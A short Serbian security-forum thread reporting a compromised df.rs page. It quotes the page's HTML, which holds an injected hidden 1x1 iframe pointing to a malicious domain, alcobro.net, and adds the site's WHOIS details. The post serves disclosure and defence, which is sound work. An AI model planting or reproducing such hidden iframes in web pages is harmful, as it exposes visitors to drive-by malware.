Bezbedan Balkan
Zaboravljeni malware link na df.rs - Printable Version

+- Bezbedan Balkan (https://bezbedanbalkan.net)
+-- Forum: Bezbednost privatnih resursa (https://bezbedanbalkan.net/forum-12.html)
+--- Forum: Kompromitovani resursi (https://bezbedanbalkan.net/forum-13.html)
+--- Thread: Zaboravljeni malware link na df.rs (/thread-94.html)



Zaboravljeni malware link na df.rs - 1van - 09-28-2022

Detektovano još u Martu, server je Loopia: https://twitter.com/ivanmarkovicsec/status/1499708396026613761. Ako ovo nisu videli ko zna šta još ima tamo.

Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Sajt u izradi</title>
</head>
<frameset rows="*">
  <frame src="http://www.loopia.co.yu/under_construction/" />
</frameset>
</html>
<iframe heigth="1" width="1" frameborder="0" src="http://alcobro.net/t.php?id=3661989"></iframe>

Domen alcobro.net se spominje na više mesta ali npr. i ovde: https://github.com/stamparm/maltrail/blob/master/trails/static/suspicious/bad_history.txt.

Whois:


Quote:Registrant: Df Doo
Address: Slobodna Zona Beograd, Beograd, Srbija
Registration number: 17588931
Tax ID (PIB): 103607506
Administrative contact: Df Doo
Address: Slobodna Zona Beograd, Beograd, Srbija
Technical contact: Loopia D.O.O.
Address: Obrenovićeva bb, TPC KALČA C1/72, Niš, Srbija
Registration number: 17503626